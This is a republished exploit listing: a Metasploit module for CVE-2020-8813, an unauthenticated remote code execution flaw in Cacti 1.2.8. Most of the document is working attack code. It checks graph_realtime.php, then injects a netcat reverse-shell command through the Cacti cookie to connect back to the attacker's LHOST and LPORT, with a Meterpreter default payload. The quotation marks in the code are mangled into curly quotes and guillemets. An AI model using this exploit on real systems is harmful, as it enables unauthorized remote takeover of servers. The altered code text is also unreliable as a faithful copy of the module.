Cacti 1.2.8 Unauthenticated Remote Code Execution ≈ Packet Storm


# Exploit Title: Cacti v1.2.8 – Unauthenticated Remote Code Execution (Metasploit)
# Date: 2020-02-29
# Exploit Author: Lucas Amorim (sh286)s
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: Linux
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Cacti v1.2.8 Unauthenticated Remote Code Execution’,
‘Description’ => %q{graph_realtime.php in Cacti 1.2.8 allows remote attackers to
execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has
the graph real-time privilege.},
‘Author’ =>
[
‘Lucas Amorim ‘ # MSF module
],
‘License’ => MSF_LICENSE,
‘Platform’ => ‘php’,
‘References’ =>
[
[‘CVE’, ‘2020-8813’]
],
‘DisclosureDate’ => ‘Feb 21 2020’,
‘Privileged’ => true,
‘DefaultOptions’ => {
‘PAYLOAD’ => ‘php/meterpreter/reverse_tcp’,
‘SSL’ => true,
},
‘Targets’ => [
[‘Automatic’, {}]
],
‘DefaultTarget’ => 0))

register_options(
[
Opt::RPORT(443),
OptString.new(‘RPATH’, [ false, « path to cacti », «  » ])
])

deregister_options(‘VHOST’)
end

def check
res = send_request_raw(
‘method’ => ‘GET’,
‘uri’ => « #{datastore[‘RPATH’]}/graph_realtime.php?action=init »
)

if res && res.code == 200
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

def send_payload()
exec_payload=(« ;nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s » % [datastore[‘LHOST’], datastore[‘LPORT’]])
send_request_raw(
‘uri’ => « #{datastore[‘RPATH’]}/graph_realtime.php?action=init »,
‘method’ => ‘GET’,
‘cookie’ => « Cacti=#{Rex::Text.uri_encode(exec_payload, mode = ‘hex-normal’)} »
)
end

def exploit
if check == Exploit::CheckCode::Vulnerable
print_good(« Target seems to be a vulnerable »)
send_payload()
else
print_error(« Target does not seem to be vulnerable. Will exit now… »)
end
end
end



Source link

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *